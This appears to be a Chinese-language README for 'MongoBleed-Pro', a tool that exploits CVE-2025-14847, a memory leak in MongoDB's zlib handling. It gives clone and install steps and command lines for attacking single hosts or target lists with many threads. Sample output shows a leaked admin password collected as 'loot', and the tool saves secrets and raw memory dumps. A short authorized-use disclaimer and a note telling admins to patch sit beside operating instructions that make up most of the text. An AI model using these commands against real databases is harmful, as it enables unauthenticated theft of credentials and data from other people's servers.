高级 MongoDB 内存泄漏利用工具
保持学习 | 保持黑客精神 - Alexcyberx
MongoBleed-Pro 是一款针对 CVE-2025-14847 的高级利用工具,该漏洞是 MongoDB 在 zlib 压缩处理中存在的严重内存泄露漏洞。该工具允许安全研究人员从存在漏洞的 MongoDB 实例中提取敏感数据。
本工具仅供 授权的安全测试和教育目的 使用。未经授权访问计算机系统属于违法行为。在测试前请务必获得适当授权。
| 属性 | 详情 |
|---|---|
| CVE ID | CVE-2025-14847 |
| 漏洞类型 | 内存泄露 |
| 受影响版本 | MongoDB < 8.0.10, < 7.3.6, < 7.0.19, < 6.0.23 |
| 根本原因 | zlib 解压缩时的缓冲区过度读取 |
| 影响 | 未经认证的远程内存泄露 |
# 克隆仓库
git clone https://github.com/alexcyberx/CVE-2025-14847_Expolit.git
cd CVE-2025-14847_Expolit
# 安装依赖
pip install -r requirements.txt
python3 mongobleed_pro.py
python3 mongobleed_pro.py --target 192.168.1.100
python3 mongobleed_pro.py --target 192.168.1.100:27018
python3 mongobleed_pro.py --file targets.txt
python3 mongobleed_pro.py --target 192.168.1.100 --threads 100 --min-offset 100 --max-offset 20000
| 参数 | 描述 | 默认值 |
|---|---|---|
--target | 目标 IP/URL | 交互式提示 |
--file | 目标列表文件 | 无 |
--threads | 线程数 | 50 |
--min-offset | 最小内存偏移 | 20 |
--max-offset | 最大内存偏移 | 8192 |
╔══════════════════════════════════════════════════════════════╗
║ 💀 启动内存提取序列 💀 ║
╚══════════════════════════════════════════════════════════════╝
⚡ 已锁定目标: 192.168.1.100:27017
✓ 端口 OPEN
☠️ 存在漏洞!开始攻击...
◉ 0x0E31 │ nr_inactive_anon 134420\nnr_active_anon 110832...
☠️ 获取战利品: 🔐 密码
→ admin_pass=SuperSecret123
╔══════════════════ 提取完成 ══════════════════╗
║ 💾 已提取字节: 125,847
║ 📦 唯一碎片: 342
║ 🔑 发现机密: 5
╚══════════════════════════════════════════════════════════════╝
| 文件 | 描述 |
|---|---|
loot_<host>.txt | 提取的机密(可读格式) |
dump_<host>.bin | 原始内存转储(用于手动分析) |
如果您是 MongoDB 管理员,请更新到已修补版本:
alexcyberx
本项目采用 MIT 许可证 - 详情请参见 LICENSE 文件。
如果您觉得此工具有用,请在 GitHub 上为它 ⭐!
「 保持学习 | 保持黑客精神 」
由 alexcyberx 用 ❤️ 制作